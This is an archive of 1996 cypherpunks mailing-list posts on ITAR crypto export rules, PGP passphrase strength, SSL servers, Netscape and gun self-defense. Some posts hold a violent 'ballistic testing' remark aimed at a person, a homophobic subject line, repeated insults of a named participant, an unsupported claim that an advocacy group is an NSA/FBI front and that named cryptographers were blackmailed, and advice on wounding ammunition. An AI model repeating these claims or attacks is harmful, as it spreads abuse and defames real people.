snow <snow@smoke.suba.com> writes:
> On Fri, 19 Jul 1996, David Sternlight wrote:
<spam spam spam spam spam spam spam spam spam spam spam spam spam spam spam>
>      I pledge allegience to this flag and THE REPUBLIC for which it stands.
>
>      REPUBLIC, GET IT? Rule by LAW as opposed to the tyranny of STUPIDITY
> called democracy.
>      ITAR _may_ be based on laws passed by congress, but since the NSA has
> yet to try the ITAR in court, and only uses it to threaten business with,
> we don't know how the courts will interpret these rules, much less the laws
> that give UNELECTED OFFICIALS the authority to make LAWS.
>
>     Yer an idiot. Not just for what you wrote above, but for just about
> everything you've said since you started posting. I had never read any
> of your writings before, and they seemed rational so I was inclined to
> give you a chance, even tho' I disagreed with you.
>
>     You have proben yourself to be a facist, and AFAIC there is only 1
> use for a facist. Ballistic testing.
>
>      Yes, I do know what a facist is, and no, I am not comparing you to
> The leader of Germany during WWII.

I share your sentiment. "Dr." David Sternlight is the moral equivalent of
Archimedes Plutonium, Dr. Jozeph Goebbels, and Janet Reno combined.

Please don't follow up on anything David Sternlight sends to the cypherpunks
mailing list, no matter what the provocation. The asshole thrives on attention.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 22 Jul 1996 05:19:12 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007609ae181b3351ac@[206.119.69.46]>
Message-ID: <a0iFRD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga <rah@shipwright.com> writes:

> At 11:41 AM -0400 7/21/96, David Sternlight wrote:
<spam spam spam spam spam spam spam spam spam spam spam spam spam spam spam>

Please, people, let's not follow up on anything "Dr." David Sternlight posts
to the cypherpunks mailing list, not matter what the provocation.

> Cheers,
> Bob Hettinga
>
>
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA
> "'Bart Bucks' are not legal tender."
>                 -- Punishment, 100 times on a chalkboard,
>                        for Bart Simpson
> The e$ Home Page: http://www.vmeng.com/rah/
>
>


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 22 Jul 1996 05:16:18 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: Re: Length of passphrase beneficial?
In-Reply-To: <2.2.32.19960721172615.006e6a64@mail.sd.cybernex.net>
Message-ID: <199607211851.OAA10237@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Erle Greer writes:
> I have a 2048-bit PgP key and pseudorandom a/n character
> generator, from which I chose a large passphrase similar to:
> 
> f4VnI1G1mGcwTZ1vGoyPwN4NLojF8Ee9ff1aicOGn87x0nwwHhJUo6XSYKEawRne
> (Yes, cut-n-paste, but my only in-house threat is my wife.)
> 
> Actual Question:
> Does the length and randomness of a passphrase contribute at all
> to the overall security of a cryptosystem?

The passphrase only does one thing for you, which is protect your
keyring in case someone gets it. Since you keep the passphrase on
line, you are actually less secure than if you used a memorable
phrase.

BTW, since the passphrase is used to hash into an IDEA key, more than
128 bits of input entropy would be wasted.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Mon, 22 Jul 1996 08:41:26 +0800
To: cypherpunks@toad.com
Subject: Giving 6 year old kids Uzi's(the thread that wont die)
In-Reply-To: <199607212043.QAA20311@lists.gateway.com>
Message-ID: <v03007602ae1866c6f67b@[204.179.128.67]>
MIME-Version: 1.0
Content-Type: text/plain


>    Yes, those guns are evil things. Evil I tell you, constantly shooting
>people for no reason, going off half-cocked and whooping it up all by
>their polished oiled ol selves.
>
>     Isn't it funny how otherwise rational people can ascribe intentions
>and moral alignement (ie. good/evil) to an inert chunk of steel?

I believe Jeff Cooper calls it "Hoplophobia - (1) An irrational fear of tools.
(2) By extension, an irrational fear of weapons or things which may be used
as weapons."

" Hoplophobia is, after all, not a reasoned position, but rather a mental
aberration. Being basically emotional, it is a feeling rather than an
examined forensic position. " J Cooper.



Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 22 Jul 1996 06:39:08 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607212015.PAA17473@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Replying to our argument about securing access to one's house: I just
recioved a permission from Alan to post his message to Cypherpunks 
maillist. He just confirmed my point that sleeping with a gun under 
the pillow in an unsecured house is extremely dangerous:

Again, I am not crusading against guns and armed self-defense, but 
I am indeed saying that simply having a firearm at home does not insure
safety and security. You have to go beyind having a gun and get a dog
and/or a metal door. A good fence is also a plus, although may not 
always be possible.

	- Igor.

Alan Olsen wrote:
> 
> At 03:49 PM 7/20/96 -0500, you wrote:
> >Alan Olsen wrote:
> >> There is a time and space dilation when the gun is pointed directly at you
> >> and about to be fired.  (Been there, done that...)  Perception tends to be
> >> skewed when all of the adrenaline is pumping into your bloodstream because
> >> of a perceived impending death.
> >> 
> >> Believe me, it does look big.  A 12 gauge especially...  (Had a brother who
> >> came close to shooting me because he thought I was a burglar.  Not fun.)
> >
> >I am very curious how it happened.
> 
> I returned back from a late night gaming session at about 2am. (I was about
> 17 at the time.) I came through the back door (because i had the key to it).
> He thought I was a burgaler and had a 12 gauge pointed at me.  After the
> first sharp peek of andreniline, I told him to put it away and I went to
> bed.  Not a fun way to end an evening...  (If I had not been so tired, it
> probibly would have effected me more.  Luckly, my brother has enough sense
> to no be short on the trigger finger.)
> 
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 21 Jul 1996 20:11:27 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <1.5.4.32.19960721091945.002f59b0@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 21:57 20/07/96 -0700, Timothy C. May wrote:
>
>Fortunately, the goal of MAD was to
>not have to be used, and it appears now to have worked quite well (albeit
>at high cost).

My problem with applying game theory to complex situations like the 
competition between powerful nations is that it is too simplistic. IANAE, 
of course, though I have done some control theory, and know how 
complex the modelling of any system becomes if it contains non-linearities, 
delays, etc. In a closed-loop system, i.e. with feedback, trying to predict 
behaviour without the foggiest notion of how to quantify the impact of
Kennedy's grandstanding on the Kruschev mind (for instance) is questionable.

To suggest that MAD worked well on the basis of the limited tryout we gave it
has little validity. If it hadn't, we wouldn't be here, would we?
We are trying to
draw general conclusions based on a biased sample of one.

Reminds me of this committee of the British Royal Air Force, trying to find
ways to protect its planes better against German anti-aircraft guns. Someone
proposed putting an extra layer of armour on those areas that received the most
shelling, and most people seemed to like the idea. One upstart suggested the
exact opposite: putting extra armour on those areas which had received the least
shelling. "Remember," he said, "we can only examine the planes that came back."

I also have a problem with the cost you mention. What is
"winning" in the context
of nations? The arms race wiped out the Soviet Union, and arguably seriously
hampered the competitiveness of American industry (which was No.1 at the end of
the war), allowing countries like Japan and Germany, with far
smaller defence budgets,
to overtake industrially.

>Useful sources:

Thank you for the tips: I will check them out. Game theory is
fascinating -- I'm just 
not sure how applicable it is in formulating policy. Didn't work
too well in Vietnam...

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Ronn" <micron@accessone.net>
Date: Mon, 22 Jul 1996 08:29:51 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <9607212220.AA00769@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 22 Jul 1996 08:39:11 +0800
To: "Chris Adams" <jimbell@pacifier.com>
Subject: Re: Opiated file systems
Message-ID: <199607212227.PAA02786@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:26 PM 7/19/96 -0800, Chris Adams wrote:
>BTW, I'd try a fiber-optic connector to the machine because 1) it's
>waterproof and you wouldn't have to be quite as paranoid about leaks, 2)
>it's far more secure, 3) it's faster and 4) it's probably impossible to
>trace like a metal wire (i.e. run current through and trace magnetic
>fields...)...

Just some random advice: My high-speed networking expert friend says that
plastic fiber is good to about 4-5 miles, and is a lot easier to work with
than glass fiber.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jul 1996 05:53:17 +0800
To: vagab0nd@sd.cybernex.net (Erle Greer)
Subject: Re: Length of passphrase beneficial?
In-Reply-To: <2.2.32.19960721172615.006e6a64@mail.sd.cybernex.net>
Message-ID: <199607212038.PAA20685@homeport.org>
MIME-Version: 1.0
Content-Type: text



Erle Greer wrote:

| f4VnI1G1mGcwTZ1vGoyPwN4NLojF8Ee9ff1aicOGn87x0nwwHhJUo6XSYKEawRne
| (Yes, cut-n-paste, but my only in-house threat is my wife.)
| 
| Actual Question:
| Does the length and randomness of a passphrase contribute at all
| to the overall security of a cryptosystem?

	Not directly.  The SECRECY of a passphrase does contribute.
If you do not provide it to your attacker (in the form of a file on
your computer which a Microsoft Worm macro carried in a message might
send out, that the search party might find, etc), then the length and
difficulty of guessing protect you.

	For random text (I'll assume you're rolling dice) like that,
figure you get about 5 bits of entropy per character.  Your PGP secret
key is IDEA encrypted with a 128 bit key, so you don't need any more
than 30 characters of random text to get a passphrase space (or
universe, to use Tim's metaphor) thats harder to search than the
keyspace.

	I think its a poor assumption that your home won't be searched
if you're doing something that makes you want a 2048 bit key.  A
thousand bits of keylength should be good enough for most things that
don't need to stay secret more than 5-10 years.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 22 Jul 1996 08:57:38 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <199607212242.PAA11398@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:13 AM 7/20/96 +0600, Arun Mehta <amehta@giasdl01.vsnl.net.in> wrote:
>Is enought information available for someone else to write
>software that would be able to 
>communicate with Netscape's at the US-level of crypto? If so, the
>US government is simply
>forcing Netscape to open a window of opportunity for some foreign
>software company to come up with a competing product for the
>international market. A case of cutting off your nose to spite your face?

The encryption and protocols used by Netscape are their SSL protocol;
you can get the Australia-written SSLeay package to do it,
though if you want to use it in the US you need to make sure
you've taken care of RSA patent-licensing issues.
There are two ends of the problem - browser and server.

It's really hard to compete with Netscape's browser,
since they add N more features per week, though you could
make a far smaller adjunct browser to handle secure transactions
that you leave running in another window while doing Netscape.

On the other hand, competing with their server is possible,
being done, and potentially big business.  During the Pro-CODE
Senate hearings, Barksdale put up a poster of a web page in 
South Africa for a web-server called Sioux, which is some relative
of Apache and maybe Apache-SSL, and which makes a big point on
its web page about not being limited by US ITAR restrictions.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 22 Jul 1996 05:54:44 +0800
To: WlkngOwl@unix.asb.com (Deranged Mutant)
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <199607202058.QAA19736@unix.asb.com>
Message-ID: <199607212041.PAA20700@homeport.org>
MIME-Version: 1.0
Content-Type: text


Good faqs have pointers to other good sources of information, even
when they're pretty near authoritative.  I'd point to Schneier,
Rivest, and Blaze as people whose endorsements carry real weight, and
point to the sci.crypt faq for more info.

Other than that, it looked like a good start.  I look forward to being
able to point people to it.

Adam

Deranged Mutant wrote:

| I've written a short "Snake Oil FAQ" below.  It's incomplete and 
| needs some work (adding a few definitions, rewording, aesthetic 
| formatting, etc.), so think of it as a 'beta' FAQ (please don't post 
| it on web pages, though I don't mind if it's distributed among 
| anyone interested in criticizing or contributing).   Comments and
| suggestions would be appreciated.   Note that the aim is to write
| something  accessible to 'newbies'.  (Jeremy Barrett contributed to
| this, BTW)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jul 1996 09:01:32 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: NCs (network computers)
Message-ID: <199607212300.QAA14231@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:53 PM 7/21/96 -0700, Vladimir Z. Nuri wrote:
>I thought this was a great message on the future "network computers"
>that may be coming out soon. a balanced view that shows how there
>may be a niche, and that there are also places where they will
>not be appropriate. the NCs could really potentially change the
>computer and cyberspace as we know it in a very significant way.


I think that the concept of "network computers" as presented is nearly a 
joke.   (It's a rehash of the common portrait of terminal/modem computers 
that was commonly promoted in the late 60's and early 70's.)   Their main 
advantage was supposed to be cost:  The "$500" figure is the one which is 
commonly presented.  However, in the middle of 1995 the components of 
computers which were NOT bargains were memory, which was kept artificially 
high by what I can't help concluding was price fixing, and over-priced CPU's 
from Intel.  The memory-price problem has now been solved after an extreme 
price decrease, and the CPU-price problem can be avoided to a great extent 
by staying with 486's or lower-end Pentiums.  What, then, are the remaining 
advantages of a "NC"?

The one thing that these network computers were supposed to save on, in 
addition to this, was a hard disk, but when I keep seeing those ads for $170 
1-gigabyte hard disks, it's hard to imagine how anybody would WANT to save 
this amount.  

Let's do a comparison:  Even a 28.8 kbps modem can't transmit much above 
3500 bytes per second after decompression, which is about 3 million seconds 
of data to fill a 1 gigabyte hard disk, or about 800 hours.  You'd have to 
be buying Internet access time for $170/800, or 20 cents per hour, to 
justify re-loading anything twice from the Internet as opposed to storing it 
locally.  Hard disks are a bargain, and it isn't worth NOT having one.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 22 Jul 1996 06:35:25 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <v03007607ae1800d8c5b1@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960721155821.22581B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


[sorry Perry]

On Sun, 21 Jul 1996, David Sternlight wrote:

> So is your comment. What was broken was not public key, but a particular
> key length (and by implication shorter ones). You can do that with just
> about any system, even a one-time pad, by brute force, but it won't buy you

Really? The only way I know of forcing a one-time pad is to use a hardware
QM-based random number generator to generate every possible decrypt, thus
creating a number of universes equal to the number of possible keys. Since
you can't tell if you're universe is the right one, one should always
verify the information obtained against a second source. IANAL, so I can't
say if such a decrypt would count as probably cause. 

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seth Oestreicher <setho@westnet.com>
Date: Mon, 22 Jul 1996 07:26:12 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Devil's Bargain
Message-ID: <1.5.4.32.19960721200813.0091ed58@westnet.com>
MIME-Version: 1.0
Content-Type: text/plain



>   The fear means they arrive early to spend more down time 
>   waiting in line to pass through security. So they adapt, 
>   thinking: That's not a barricade, it's a flowerpot. They 
>   give up a little freedom in exchange for feeling safe, "all 
>   watched over," as the late poet Richard Brautigan wrote, 
>   "by machines of loving grace." 
> 
As the great Benjamin Frankling said:

Those who would sacrifice essential freedom for temporary safety deserve
neither.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seth Oestreicher <setho@westnet.com>
Date: Mon, 22 Jul 1996 06:56:25 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <1.5.4.32.19960721201853.008c533c@westnet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Similarly, I do not uderstand why futurists paint so rosy pictures of
>the 21st century. I think that it will be at least just as full of shit
>as this one.

I find it ironic that the greatest peace movement in history is recorded
after World War I.  Nobody wanted to fight any more.  Yet, less than 40
years later entered World War II, a more damaging and far reaching war.
People thought the League of Nations, and later the United Nations would
solve the worlds problems.  But things don't change.  Jews and Arabs have
fought their ENTIRE history.  Americans are arogent enough to believe that
*we* can help resolve a conflict 100 times older than our nation.  Serbians
and Croations have *ALWAYS* fought.  Why should we expect otherwise today?
Because we're ENLIGHTENED?  Are we still not people?

Things today are probably better than they have EVER been.  (At least in the
terms of war.)  Mutually Assured Destruction has kept us out of many wars,
and will probably continue to do so.  So things may get better, not because
we are enlightened.  Things will get better due to the massive destructive
power of the United States.  Unfortunatly, political pressure will keep
America from using that force, and terrorist activity will continue to escalate.

Seth
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 22 Jul 1996 07:32:14 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607211915.OAA17048@manifold.algebra.com>
Message-ID: <HNNFRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> David Sternlight wrote:
<spam spam spam spam spam spam spam spam spam spam spam spam spam spam spam>
>
> It is not surprising that after the society decided to label
> natural economic activities (drug dealing) as crimes, it has
> to resort to unnatural methods of enforcing the unnatural
> legislation.
...

Please do not respond to anything "Dr." David Sternlight posts to this
mailing list, no matter what nonsense he says. The asshole is starved
for attension. He's just trolling for flames. Please ignore him. Thank you.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 22 Jul 1996 07:14:22 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607211931.MAA23264@netcom2.netcom.com>
Message-ID: <DkoFRD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:
> David Sternlight <SternPutz@Troll.com> spews forth:
>
>  > The above suggests your mind is closed. I'm going to
>  > respond once for the benefit of other readers before
>  > plonking you. Feel free to e-mail me if you really want a
>  > discussion and not just to hear yourself talk.
>
> How many gigs is the legendary SternBot Killfile by now?  Do you
> use a RAID array?

Please don't respond to Steinlight's spam - thank you...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seth Oestreicher <setho@westnet.com>
Date: Mon, 22 Jul 1996 07:14:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: pledge status
Message-ID: <1.5.4.32.19960721204709.00910afc@westnet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Subsequent to the initial Waco raid, the government was claiming that the 
>Davidians were "ready" for them.  I think it was easy to tell that this was 
>a lie:  Had they actually been READY, far more than 4 agents would have been 
>dead.
        
See this month's Soldier of Fortune magazine (who has done an outstanding
job of covering Waco issues) for a look at the connection between the FBI
Counter Terrorism Unit and the Army's Delta Force.  (If this is true, then
once again our government is breaking the law, the Army is not allowed to be
used in the policing of civilians!)

Seth





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Mon, 22 Jul 1996 12:08:52 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Borders *are* transparent
In-Reply-To: <199607212242.PAA11398@toad.com>
Message-ID: <199607220027.RAA12446@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> South Africa for a web-server called Sioux, which is some relative
> of Apache and maybe Apache-SSL, and which makes a big point on

	It's based on Apache, not Apache-SSL. I guess Barksdale didn't
talk about Apache-SSL, which is also available without export
restrictions from the UK. Perhaps because he knows that Apache-SSL is
an incredibly superior product to Netscape's servers..

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 22 Jul 1996 08:49:00 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <Pine.SUN.3.91.960721155821.22581B-100000@tipper.oit.unc.edu>
Message-ID: <L4qFRD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

> [sorry Perry]
>
> On Sun, 21 Jul 1996, David Sternlight wrote:
<spam spam spam spam spam spam spam spam spam spam spam spam spam spam spam>

Sigh. :-(

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Llywarch Hen <ecgwulf@postoffice.worldnet.att.net>
Date: Mon, 22 Jul 1996 11:30:51 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.16.19960722004904.1a3fece0@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:15 PM 7/21/96 +0000, you wrote:

>Again, I am not crusading against guns and armed self-defense, but 
>I am indeed saying that simply having a firearm at home does not insure
>safety and security. You have to go beyind having a gun and get a dog
>and/or a metal door. A good fence is also a plus, although may not 
>always be possible.

I'd certainly agree with that, but would like to add that an unloaded gun is
of no use and a gun in the nightstand or in the trunk of your car is also of
no use. For all cases other than home intrusion, the gun has to be worn -- I
recommend a shoulder holster. In the case of home intrusion, one can hope
that the intruder has no desire to be successful and permits you to get the
drop on him. Perhaps he'll slam the refrigerator door allowing you to fumble
around under your pillow for your weapon. I know of people who have walked
out of museums with paintings trailing alarm wires -- so let's hope our
intruder is an amateur and best of all is scared off by some phony security
signs, fake alarm wires, etc.

In these parts most guns seemed to be used by the temporarily depressed
teenaged children of gun owners. One kid managed to live as a vegetable
having successfully removed the source of his unhappiness -- his brain.
Tough luck. Pretty hard to aim properly when you are upset. Lesson: keep
your cool.

Now for street wear I strongly recommend a variety of loads. Probably my
favorite is a reversed semi-wadcutter. This puppy is extremely inaccurate
since it starts tumbling as it leaves the barrel. At extremely close ranges
it'll tear up some flesh and further out it'll walk nastily through outer
clothing completely wrecking it for formal wear and continue through enough
skin to be damaging. Low on kinetic energy, it will however transfer its
entire momentum where it counts. A semi-automatic will not properly feed
these, so you gotta be traditional if you are of the big clip persuasion.

A few observations: since our hog leg is shoulder-holstered we will need a
coat. Now if you want to take a piss, court-houses, airports and a few other
public buildings are out. We would feel foolish being tackled and thrown to
the floor while hunting for the restroom even if we slipped past security.
So here we are, sweating and chafing with a gun and a coat and a urinary
tract infection. Feel safe yet?
-- Llywarch Hen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: initialization <initialization@nemesis.meaning.com>
Date: Mon, 22 Jul 1996 11:36:10 +0800
To: cypherpunks@toad.com
Subject: Re: INFO: Submit your testimony to Congress for hearings on July 25!
Message-ID: <199607220123.SAA28599@black.colossus.net>
MIME-Version: 1.0
Content-Type: text/plain


vtw@vtw.org writes:
> UPCOMING HEARING INFORMATION
> 
> The Senate Commerce committee will be holding hearings on the Burns/Leahy
> Pro-CODE bill (S.1726) this Thursday July 25, 1996 in Washington D.C.
> 
> Like most everyone that doesn't live in Washington, you can't be there
> in the flesh.  But you can be there virtually through www.crypto.com!
> 
> A RealAudio cybercast of the hearing is being coordinated by Jonah Seiger
> (CDT).  If you have the RealAudio software (it's free from www.realaudio.com)
> you can listen to the hearing live.  You can also telnet into the chat room
> and pose questions to the staffers who will be online.
> 
> If you wish to make your voice heard, take a moment and submit your own
> written testimony through the web page at http://www.crypto.com.  When
> you submit your testimony, you can also submit a question for FBI Director
> Louis Freeh who is scheduled to testify.  We'll provide a copy of the
> questions to the committee members, and urge them to pin down Director 
> Freeh on some of the finer points of the issue.
> 
> This is an amazing time for democracy.  Never before have American citizens
> been able to have so much representation in the halls of Congress without
> actually being physically there.  Don't let this debate go on without your
> input!
> 
> A complete profile of the cybercast and the net-presence effort is available
> at http://www.crypto.com/ until the hearing, and at
> http://www.crypto.com/events/ after that.
> 

This is an amazing time for Big Brother, who, in the person of VTW,
is gathering the names and addresses of all who oppose it, one by one,
under the Rube of "testimony" and "democracy"?

What do you think will happen next? You think Big Brother is going to hear
what you say and say "oh my god they are right!" and then turn around
and mend its ways? NO! You will be marked as a trouble maker in your file,
and rounded up or worse, when the time comes!

They have duped many into participating, and others, prominent ones like
Blaze, Diffie, Schneier, Zimmermann, have been blackmailed into working
for them.

Turn your back on this sham "democracy". Fuck their "hearings". And demand
truth from "VTW". VTW=NSA+FBI front.

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 22 Jul 1996 04:56:29 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607210113.SAA05824@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960721182810.755A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 20 Jul 1996, jim bell wrote:

> >> Do you Seriously Believe that Netscape would prefer foreigners
> >> to develop and use competing products? Of course not. They are
> >> probably secretly applauding the brave exporters.
> >
> >You are wrong.  We are worried that our permission to provide these
> >products will be withdrawn. 
> 
> As far as I can tell, you need no "permission" to "provide these products", 
> at least domestically.  The only restrictions that have been implied have 
> been over the delivery of encryption over the 'net, and even that is 
> questionable.
> 

If even that much.  Most of the "permission" i've heard of was infered at
best.  The NSA, nor anybody else, has the _legal_ power to stop you from
putting crypto on the Web, on FTP, or anywere else, so long as you do not
_willingly_ give it to foreign citizens.  If some non-citizen downloads it,
and said they were a US citizen, its not your fault. you THOUGHT you were
giving it to a citizen, which is all the law actually requires.  Of
course, if anybody like Netscape actually had the guts to take this to
court, arguing that ITAR doesn't cover Crypto, the ACLU and other such
would probably back them, and it'd stand a fair chance.  Unfortunatly,
everybody in a position to do this has decided they'd rather not risk
having presidence (sp?) that this _was_ covered under ITAR, of which there
is none.

 --Deviant


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfJ4NjAJap8fyDMVAQH1/Qf/RmVcN8GpTUbUbC7MfhF+S06wT4ANE92I
CYIlEn6dWCwA5AAc0EN0WjFy6Tww/S6VCsxemuaxJk6wS0rbAY8ot8DDsAGiilV7
bzkNJOx472paf9fEjIaN7SHzjHd1gd/ZZnQIv1v9mUIYESsC860+8LGtt+g6i/um
xpFZXp+6VXog7U941JZ+AOOUnYUVqWBhciOy+zf8MU98TcpKpjpg/PJcfsrQLZWm
5+9yI8OAbLiyrrtTRTGc+jjyRU9pQ7yxU/e0+sSXSQl5iETGG79Kx3urCnO1BqoU
k3E2RgTOlQ7mOSAPZIAzUxsuIBEMEs7eQQn8D7EP5Bih/0la3zRCaQ==
=QxJW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 22 Jul 1996 12:09:02 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Netscape
In-Reply-To: <199607220009.RAA08680@dns2.noc.best.net>
Message-ID: <31F2DBAE.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
> > Why not consider what the consequences will be?  Do you seriously
> > believe that this will make the government stop enforcing ITAR?
> 
> Yes:
> 
> Widespread politically motivated disobedience forces
> the state to either demonize the disobedient, (as with drug users)
> or give up enforcement.  This is a standard and effective method
> of forcing the repeal of laws, a method which has had a long record
> of success for several hundred years.

A handful of cyperpunks hardly constitutes "widespread polititcally
motivated disobedience".  In any case, the demonization has already
begun; they point their fingers at the four horsemen of the internet
at every oportunity.

What I object to is anonymous activists who perform acts at no risk to
themselves which make it harder for those of us who are trying to bring
strong crypto to everyone.

> The states cohesion derives from its legitimacy, and threats to
> legitimacy and cohesion are treated very seriously by government
> officials.
